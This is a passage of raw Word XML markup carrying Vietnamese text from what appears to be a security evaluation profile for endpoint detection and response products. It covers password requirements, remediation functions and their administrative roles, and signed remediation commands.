      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:t>không có yếu tố nào khác]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8DAF4C" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>] để hỗ trợ đăng nhập vào bất kỳ bảng điều khiển hoặc API quản lý nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428AEC06" w14:textId="19E44AE8" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00893DC3" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">FIA_PWD_EXT </w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Xác thực mật khẩu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D6DDB" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:lastRenderedPageBreak/>
        <w:t>Các thành phần trong họ này xác định các yêu cầu đối với tiêu chí xác thực mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABC55EE" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cân bằng các thành phần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06397078" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>FIA_PWD_EXT.1, Xác thực mật khẩu, xác định các yêu cầu về độ dài và bộ ký tự cho các yếu tố xác thực mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649C595F" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Quản lý: FIA_PWD_EXT.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D910A" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Không có chức năng quản lý cụ thể nào được xác định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52520C51" w14:textId="3D050999" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00893DC3" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kiểm toán</w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>: FIA_PWD_EXT.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AF578B" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Không có sự kiện có thể kiểm toán dự kiến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE3A59" w14:textId="266B5525" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00893DC3" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">FIA_PWD_EXT.1 </w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Xác thực mật khẩu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D153C8" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Phân cấp thành: Không có thành phần nào khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E87E544" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Phụ thuộc vào: FIA_AUT_EXT.1 Cơ chế xác thực bảng điều khiển</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7331B9" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FIA_PWD_EXT.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2447861D" w14:textId="4F42C602" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>EDR phải hỗ trợ những điều sau đây cho Yếu tố xác thực mật khẩu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F0BC68" w14:textId="467CCBCC" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>1. Mật khẩu có thể bao gồm bất kỳ sự kết hợp nào của [</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>chữ hoa và chữ thường</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>, [</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>bộ ký tự ít nhất 52 ký tự</w:t>
      </w:r>
      <w:r w:rsidR="00EA77DD" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>số và ký tự đặc biệt</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>: [</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>"!", " @", "#", "$", "%", "^", "&amp;", "*", "(", ")"</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>, [</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ký tự khác</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>]],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C78D2A0" w14:textId="15045377" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>2. Độ dài mật khẩu lên tới [</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>một số nguyên lớn hơn hoặc bằng 64</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>] ký tự phải được hỗ trợ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02350CBC" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FMT_SRF_EXT Thông số kỹ thuật của chức năng khắc phục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48363C26" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Các thành phần trong họ này xác định các yêu cầu đối với chức năng khắc phục mà EDR có thể thực hiện để tác động đến hành vi của hệ thống điểm cuối.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AE4BF5" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cân bằng các thành phần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A4D1CB" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>FMT_SRF_EXT.1, Đặc tả chức năng khắc phục, liệt kê các chức năng khắc phục được hỗ trợ và xác định các vai trò quản lý có thể thực hiện các chức năng này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E111FC7" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Quản lý: FMT_SRF_EXT.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FCF6A0" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Không có chức năng quản lý cụ thể nào được xác định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508E3017" w14:textId="0FFD7C7A" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00893DC3" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kiểm toán</w:t>
      </w:r>
      <w:r w:rsidR="00EA0B48" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>: FMT_SRF_EXT.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D7C5A2" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Không có sự kiện có thể kiểm toán nào được thấy trước.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C5CB8A" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FMT_SRF_EXT.1 Đặc điểm kỹ thuật của chức năng khắc phục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701E585A" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Phân cấp thành: Không có thành phần nào khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57307220" w14:textId="22FB4E62" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Phụ thuộc vào: FMT_SMR.1 Vai trò quản lý </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971229" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FMT_SRF_EXT.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0953F" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>EDR phải có khả năng thực hiện các chức năng khắc phục sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10065" w:type="dxa"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5103"/>
        <w:gridCol w:w="1418"/>
        <w:gridCol w:w="1984"/>
        <w:gridCol w:w="1560"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w14:paraId="6826CF1C" w14:textId="77777777" w:rsidTr="00EA0B48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="698A7085" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Chức năng quản lý</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F0B87F6" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Quản trị</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="786BECEA" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Chuyên gia phân tích SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F6CB349" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Người đọc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w14:paraId="77977FFB" w14:textId="77777777" w:rsidTr="00EA0B48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33E44BF9" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>Cách ly một điểm cuối bằng cách [lựa chọn: cách ly hợp lý điểm cuối khỏi mạng trừ khi được cho phép, cách ly tệp độc hại trên điểm cuối]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437163" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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61CC51" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>M</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8E801BC" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w14:paraId="6B371F54" w14:textId="77777777" w:rsidTr="00EA0B48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A15B59A" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>Chấm dứt một tiến trình đang chạy trên một điểm cuối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E47A55" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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360138" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>M</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FD9A260" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w14:paraId="04A8BEDF" w14:textId="77777777" w:rsidTr="00EA0B48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CB9CD48" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>Truy xuất các tệp có khả năng bị trái phép hoặc bị ảnh hưởng từ một điểm cuối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050F0F" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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1F8C5D" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w: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558A46E" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58AF193F" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FMT_TRM_EXT Chức năng khắc phục đáng tin cậy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068747B" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Các thành phần trong họ này xác định cách TOE có thể khẳng định tính xác thực của các hành động khắc phục mà nó yêu cầu từ Đại lý máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5249706B" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cân bằng các thành phần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666A9BA0" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>FMT_TRM_EXT.1, Chức năng khắc phục đáng tin cậy, yêu cầu tất cả các hoạt động quản lý được ràng buộc đối với Tác nhân máy chủ phải được ký điện tử.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E13267" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Quản lý: FMT_TRM_EXT.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345754C3" w14:textId="77777777" w:rsidR="00EA0B48" w:rsidRPr="00204C5F" w:rsidRDefault="00EA0B48" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Không có chức năng quản lý cụ thể nào được xác định.</w:t>
